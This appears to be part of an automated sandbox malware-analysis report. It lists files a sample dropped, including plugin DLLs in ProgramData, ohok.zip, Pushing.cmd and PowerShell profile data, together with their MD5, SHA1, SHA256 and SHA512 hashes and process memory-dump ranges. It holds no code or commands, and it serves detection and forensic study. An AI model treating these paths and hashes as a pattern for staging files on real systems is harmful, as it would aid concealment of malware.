SHA512 396f28eb15ed793db453cd3b3e9118f4386fe24a75e3f3914e881cca3ada8918b98751bdac51c4a5e897cca1e700b2a545686463a6b0dd6719ea172682cfb928

C:\ProgramData\texture_rgba_renderer_plugin.dll

MD5 128d06b8c5739f35a7c76a76bf1e6149
SHA1 901f9698bf4c4a10e8e902e6dbddf1782e1067d0
SHA256 bf585dbc4e4dce47f9efdeead15f67a69644ce6f1177ceec518882dc85ecc096
SHA512 ece9254486347751d6f68ae86afb36508fed81b00c4588f555db584a0e9de5f4710a24e6bb5b2b19a25bee20aa4bf90068f9eb2e37b48271614b6c97199e419c

C:\ProgramData\screen_retriever_plugin.dll

MD5 2d885495e81a8b8d1d5305fe20566484
SHA1 f1d2083d399dd48927cbd83e23f90ad3ce3e0632
SHA256 eb2e18881ddd80a3e54527264b3e7c5046f15854a196b76ccad28e8258f3f1b2
SHA512 e2bb9f8e377b381cc13538b39e8b3fb749341fcef84e7b26749bf35141c6c52a48636bb00c6fa7c585eec4c01b03cd0ec38c8f3e85e0ca2c2cda26d026def326

C:\ProgramData\flutter_gpu_texture_renderer_plugin.dll

MD5 e6c6c72226677bacf6ec83beda63f49d
SHA1 c0e75c5a5b9d7c8cd07e80a2ba4d809801eff649
SHA256 2018f17e324516fc891e5c868e2045970855a3a1521d73f0f6ae12ebf12cfbba
SHA512 3a52b60711efb4a34e5ff655e60d51a29c6d4b2cd4561a421a51647d5fcb2c75f1468a8f93c25206edebcf259112a4c7da41f90181ff7e53946e1fff5fb3f353

C:\ProgramData\file_selector_windows_plugin.dll

MD5 9641732f1db2eab135130c9128c1427a
SHA1 88b0857cfe055a1d920e55b3094116162e4eaa00
SHA256 b47cd11e4089fe0ae8baf4e05b4ccf19b1dfe403fd392649e9253c05d58f3cbc
SHA512 5c87b26e51771b61fdf87d577781b1fb163527d0f03e74327bc11ea1a24b1b449d4ab23f7393466ed4baf3809a5151eb30928f462b5fcd55bb8de4bd733856a8

C:\ProgramData\desktop_drop_plugin.dll

MD5 f4df6a33f0e0633dc756f78f8838a067
SHA1 ce1c4544e1ea3db01ce2738b2575b0c33c25377d
SHA256 c373994fbe373f500b129aff6700339c663ef14052eeaca53da8500877cbb937
SHA512 b3f7323e8eabea7ece7e52ba65bb6489029bcef6cb4935a01522fa973b3a0a108e1db2c8ea64abdd8a0529f5a9e15526b1677650c51757f775c38bfc1cd05e14

memory/1936-237-0x00007FFA500A0000-0x00007FFA50512000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\beedbd78

MD5 174edf1933b82a399b614e092e04c3b2
SHA1 8ad2eed94f563c40fb051d96fbdda12f7148ed2a
SHA256 ceff3eb60d142bb1fdf699f62cb3d92af5cab0c4a7f90b74f9b711ecbe6bf698
SHA512 1d6d0f1790a0f3ed6fe3a3e4d44961b9a1efc9e0f5663c4e31f1cc2994060ce06134ab5ffcfb0e6052ec740b7420debecc0eb5ebc3964b3266463e4baaf88d20

memory/3000-243-0x00007FFA51750000-0x00007FFA51945000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 f47baf517b53aff2b0edf7e7e9864e01
SHA1 7f3c1fded0e9b328108b1568be8601bfa794b2df
SHA256 c3a63cff50b2a98aa2533535d64de9e7d295e1eec808c70af38c3a393f9bc40b
SHA512 07cb18cc2532238364dc3987fabc97b520bb75cc0f7ede95f8836223f9f8a086d7e4b09d8a0a625c8e9828d183871322cc4afc16a98a8af2262c4234a5687a51

memory/4964-258-0x00000000063F0000-0x0000000006744000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ef3cd3ba0aafeb152d085021accc6d6f
SHA1 272a9e587a51b637d6a037fc0422b28ebaec3fc0
SHA256 523e2fb13fbec89a96520226611473a75f6426464b0f75222426f67ef8fd9583
SHA512 c6d4de5906f777e63ebba097e750a9187560df1e98d9d8e7f5c05e0ba5aa2e3292bd952a6a2321b2718ba10e6164928f2590d83e45ca1248cd50dc26e8ac1055

memory/4964-260-0x000000006D020000-0x000000006D06C000-memory.dmp

memory/4964-270-0x0000000007CD0000-0x0000000007D73000-memory.dmp

memory/4964-271-0x0000000007F30000-0x0000000007F41000-memory.dmp

C:\ProgramData\ohok.zip

MD5 e02bfbbd372fdcb1983c1be661d68472
SHA1 2fa2e2937a92a9f97060efadc28c2524db671d16
SHA256 4566ae83ab0b869ba3d80e69966e7b296126ef28d9d5fe2e6c00b6a95ac3325d
SHA512 7e69a1c7fa2cb06adda7fb5d7a73cd589cdf94f465be7b1112571530e59b898646d48b9f6017b9d86dbd3e5a399a0eac021837147534fff249c0343831bc73cb

memory/1908-287-0x00007FFA500A0000-0x00007FFA50512000-memory.dmp

C:\Users\Admin\AppData\Roaming\LocalTls\desktop_drop_plugin.dll

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1908-305-0x00007FFA500A0000-0x00007FFA50512000-memory.dmp

memory/3000-307-0x0000000075720000-0x0000000075B5C000-memory.dmp

memory/4880-308-0x00007FFA51750000-0x00007FFA51945000-memory.dmp

memory/2956-310-0x00007FFA51750000-0x00007FFA51945000-memory.dmp

memory/2956-311-0x0000000000F70000-0x0000000000FC0000-memory.dmp

memory/2956-323-0x0000000000F70000-0x0000000000FC0000-memory.dmp

memory/4864-324-0x00007FFA51750000-0x00007FFA51945000-memory.dmp

memory/2956-327-0x0000000000F70000-0x0000000000FC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Pushing.cmd

MD5 f32d10ac89424e8d8658ff3b481c07c8
SHA1 e9718a08c8660e86bed522c616b0868cc4c1f61c
SHA256 6affa8644e677b6e7d9923cb78189be774ee32e7d12cde4b402344dea79fd2e7
SHA512 01d281476c3ff1ddb3668c078f36e38b3dccdf4a1578fdc9678ca29a1970b4cba3dc74f061ea9605d393bf76a8af7b8bea16ca61b199eb72439d1196ee42dce2

memory/4864-778-0x0000000000EE0000-0x0000000000F30000-memory.dmp

memory/4728-784-0x00000000049D0000-0x0000000004A36000-memory.dmp

memory/4728-785-0x00000000049D0000-0x0000000004A36000-memory.dmp

memory/4728-786-0x00000000049D0000-0x0000000004A36000-memory.dmp

memory/4728-787-0x00000000049D0000-0x0000000004A36000-memory.dmp

memory/4728-788-0x00000000049D0000-0x0000000004A36000-memory.dmp

memory/4728-789-0x00000000049D0000-0x0000000004A36000-memory.dmp

memory/4728-790-0x00000000049D0000-0x0000000004A36000-memory.dmp

memory/4864-791-0x0000000000EE0000-0x0000000000F30000-memory.dmp

memory/4864-794-0x0000000000EE0000-0x0000000000F30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\64684\x

MD5 1f9b5a942b513f1fbd30ceb1c706ad8b
SHA1 b41e420c4202e90493d7900f8e62b92dfac3a3c3
SHA256 ac78619a32f1d561436ea5cbe000374255a263c2ea9131887670b539d154fb4f
SHA512 1ee595b4a1a7b083f84b514acc55e66928240d230d31e0415986ca9452e2647dfff81b6d910e4402350bb56fd54005f8474fc20badd5e8e2ac4945e179a20abb